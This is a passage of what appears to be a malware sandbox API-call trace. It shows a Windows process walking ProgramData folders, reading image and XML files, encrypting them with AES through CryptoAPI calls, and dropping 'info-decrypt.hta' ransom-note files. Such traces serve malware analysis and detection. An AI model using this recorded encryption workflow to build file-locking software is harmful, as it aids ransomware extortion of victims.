dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x50c [0145.032] GetFileType (hFile=0x50c) returned 0x1 [0145.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0145.032] GetFileType (hFile=0x50c) returned 0x1 [0145.032] GetFileSize (in: hFile=0x50c, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x70c1 [0145.033] ReadFile (in: hFile=0x50c, lpBuffer=0x3697ad0, nNumberOfBytesToRead=0x70c1, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x3697ad0*, lpNumberOfBytesRead=0x691f29c*=0x70c1, lpOverlapped=0x0) returned 1 [0145.214] CloseHandle (hObject=0x50c) returned 1 [0145.214] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xb1eae8) returned 1 [0145.215] CryptGenRandom (in: hProv=0xb1eae8, dwLen=0x10, pbBuffer=0x370def8 | out: pbBuffer=0x370def8) returned 1 [0147.011] CryptImportKey (in: hProv=0xb1eae8, pbData=0x3732240, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f510) returned 1 [0147.011] CryptContextAddRef (hProv=0xb1eae8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.011] CryptContextAddRef (hProv=0xb1eae8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.011] CryptDuplicateKey (in: hKey=0xb7f510, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f490) returned 1 [0147.011] CryptContextAddRef (hProv=0xb1eae8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.011] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x4, pbData=0x3732320*=0x1, dwFlags=0x0) returned 1 [0147.011] CryptSetKeyParam (hKey=0xb7f490, dwParam=0x1, pbData=0x37322ec, dwFlags=0x0) returned 1 [0147.011] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3732330*, pdwDataLen=0x691f268*=0x70d0, dwBufLen=0x70d0 | out: pbData=0x3732330*, pdwDataLen=0x691f268*=0x70d0) returned 1 [0147.011] CryptEncrypt (in: hKey=0xb7f490, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3739424*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x3739424*, pdwDataLen=0x691f270*=0x10) returned 1 [0147.013] CryptDestroyKey (hKey=0xb7f510) returned 1 [0147.013] CryptReleaseContext (hProv=0xb1eae8, dwFlags=0x0) returned 1 [0147.013] CryptReleaseContext (hProv=0xb1eae8, dwFlags=0x0) returned 1 [0147.013] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png", lpFilePart=0x0) returned 0x5f [0147.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0147.013] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\overlay.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0147.014] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0147.014] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x0) returned 0x60 [0147.015] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0147.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0147.015] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb14d00, ftCreationTime.dwHighDateTime=0x1d68bad, ftLastAccessTime.dwLowDateTime=0xeb14d00, ftLastAccessTime.dwHighDateTime=0x1d68bad, ftLastWriteTime.dwLowDateTime=0xeb14d00, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x155e)) returned 1 [0147.015] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0147.015] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x0) returned 0x60 [0147.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0147.015] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), fInfoLevelId=0x0, lpFileInformation=0x373a3ec | out: lpFileInformation=0x373a3ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0c6929, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0c6929, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc76d9e43, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x99d3)) returned 1 [0147.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0147.182] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x0) returned 0x60 [0147.182] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0147.182] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x50c [0147.182] GetFileType (hFile=0x50c) returned 0x1 [0147.182] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0147.182] GetFileType (hFile=0x50c) returned 0x1 [0147.182] GetFileSize (in: hFile=0x50c, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x99d3 [0147.182] ReadFile (in: hFile=0x50c, lpBuffer=0x37d0020, nNumberOfBytesToRead=0x99d3, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x37d0020*, lpNumberOfBytesRead=0x691f29c*=0x99d3, lpOverlapped=0x0) returned 1 [0147.186] CloseHandle (hObject=0x50c) returned 1 [0147.186] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x691f23c*=0xbdf508) returned 1 [0147.187] CryptGenRandom (in: hProv=0xbdf508, dwLen=0x10, pbBuffer=0x37da0b8 | out: pbBuffer=0x37da0b8) returned 1 [0147.684] CryptImportKey (in: hProv=0xbdf508, pbData=0x36c9604, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x691f20c | out: phKey=0x691f20c*=0xb7f750) returned 1 [0147.684] CryptContextAddRef (hProv=0xbdf508, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.684] CryptContextAddRef (hProv=0xbdf508, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.684] CryptDuplicateKey (in: hKey=0xb7f750, pdwReserved=0x0, dwFlags=0x0, phKey=0x691f1fc | out: phKey=0x691f1fc*=0xb7f190) returned 1 [0147.684] CryptContextAddRef (hProv=0xbdf508, pdwReserved=0x0, dwFlags=0x0) returned 1 [0147.684] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x4, pbData=0x36c96e4*=0x1, dwFlags=0x0) returned 1 [0147.684] CryptSetKeyParam (hKey=0xb7f190, dwParam=0x1, pbData=0x36c96b0, dwFlags=0x0) returned 1 [0147.684] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x36c96f4*, pdwDataLen=0x691f268*=0x99e0, dwBufLen=0x99e0 | out: pbData=0x36c96f4*, pdwDataLen=0x691f268*=0x99e0) returned 1 [0147.685] CryptEncrypt (in: hKey=0xb7f190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36d30f8*, pdwDataLen=0x691f270*=0x0, dwBufLen=0x10 | out: pbData=0x36d30f8*, pdwDataLen=0x691f270*=0x10) returned 1 [0147.686] CryptDestroyKey (hKey=0xb7f750) returned 1 [0147.686] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0147.686] CryptReleaseContext (hProv=0xbdf508, dwFlags=0x0) returned 1 [0147.686] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", nBufferLength=0x105, lpBuffer=0x691ece0, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png", lpFilePart=0x0) returned 0x60 [0147.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1d4) returned 1 [0147.686] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\superbar.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.274] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691e010) returned 1 [0148.274] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0148.274] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpFilePart=0x0) returned 0x53 [0148.274] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpFilePart=0x0) returned 0x54 [0148.274] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f050 [0148.275] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.275] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0148.275] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0148.275] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0148.276] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0148.276] FindClose (in: hFindFile=0xb7f050 | out: hFindFile=0xb7f050) returned 1 [0148.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0148.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0148.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f38c) returned 1 [0148.276] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", nBufferLength=0x105, lpBuffer=0x691ee94, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}", lpFilePart=0x0) returned 0x53 [0148.276] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", nBufferLength=0x105, lpBuffer=0x691ee68, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\", lpFilePart=0x0) returned 0x54 [0148.276] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\*", lpFindFileData=0x691f0b4 | out: lpFindFileData=0x691f0b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f050 [0148.276] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd96989e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd96989e, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd96989e, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.277] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1, dwReserved0=0x0, dwReserved1=0x0, cFileName="background.png", cAlternateFileName="")) returned 1 [0148.277] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2feb941, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd2feb941, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x769, dwReserved0=0x0, dwReserved1=0x0, cFileName="behavior.xml", cAlternateFileName="")) returned 1 [0148.277] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 1 [0148.277] FindNextFileW (in: hFindFile=0xb7f050, lpFindFileData=0x691f0c4 | out: lpFindFileData=0x691f0c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3011a9e, ftCreationTime.dwHighDateTime=0x1ca0407, ftLastAccessTime.dwLowDateTime=0xd3011a9e, ftLastAccessTime.dwHighDateTime=0x1ca0407, ftLastWriteTime.dwLowDateTime=0x9c0d5455, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x70c1, dwReserved0=0x0, dwReserved1=0x0, cFileName="watermark.png", cAlternateFileName="")) returned 0 [0148.277] FindClose (in: hFindFile=0xb7f050 | out: hFindFile=0xb7f050) returned 1 [0148.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f34c) returned 1 [0148.277] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f358) returned 1 [0148.278] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x0) returned 0x62 [0148.278] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0148.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f268) returned 1 [0148.278] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x691f2e4 | out: lpFileInformation=0x691f2e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0148.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f264) returned 1 [0148.278] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x105, lpBuffer=0x691ee00, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x0) returned 0x62 [0148.278] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x691eca8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta", lpFilePart=0x0) returned 0x64 [0148.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f19c) returned 1 [0148.278] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0149.076] GetFileType (hFile=0x31c) returned 0x1 [0149.076] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f198) returned 1 [0149.076] GetFileType (hFile=0x31c) returned 0x1 [0149.077] WriteFile (in: hFile=0x31c, lpBuffer=0x3759c94*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x691f260, lpOverlapped=0x0 | out: lpBuffer=0x3759c94*, lpNumberOfBytesWritten=0x691f260*=0x1000, lpOverlapped=0x0) returned 1 [0149.078] WriteFile (in: hFile=0x31c, lpBuffer=0x3759c94*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x691f234, lpOverlapped=0x0 | out: lpBuffer=0x3759c94*, lpNumberOfBytesWritten=0x691f234*=0x55e, lpOverlapped=0x0) returned 1 [0149.078] CloseHandle (hObject=0x31c) returned 1 [0149.078] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x105, lpBuffer=0x691ee08, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x0) returned 0x62 [0149.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f2b4) returned 1 [0149.078] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), fInfoLevelId=0x0, lpFileInformation=0x375acb0 | out: lpFileInformation=0x375acb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c0af2f7, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x9c0af2f7, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x9c0af2f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1fad1)) returned 1 [0149.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f2b0) returned 1 [0149.079] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", nBufferLength=0x105, lpBuffer=0x691ecf4, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png", lpFilePart=0x0) returned 0x62 [0149.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x691f1e8) returned 1 [0149.079] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png" (normalized: "c:\\programdata\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\background.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x31c [0149.079] GetFileType (hFile=0x31c) returned 0x1 [0149.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x691f1e4) returned 1 [0149.079] GetFileType (hFile=0x31c) returned 0x1 [0149.079] GetFileSize (in: hFile=0x31c, lpFileSizeHigh=0x691f2f0 | out: lpFileSizeHigh=0x691f2f0*=0x0) returned 0x1fad1 [0149.079] ReadFile (in: hFile=0x31c, lpBuffer=0x4b26b60, nNumberOfBytesToRead=0x1fad1, lpNumberOfBytesRead=0x691f29c, lpOverlapped=0x0 | out: lpBuffer=0x4b26b60*, lpNumberOfBytesRead=0x691f29c*=0x1fad1, lpOverlapped=0x0) returned 1 [0149.082] CloseHandle (hObject=0x31c) returned 1 [0149.082] CryptAcquireContextW (in: phProv=0x691f23c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", 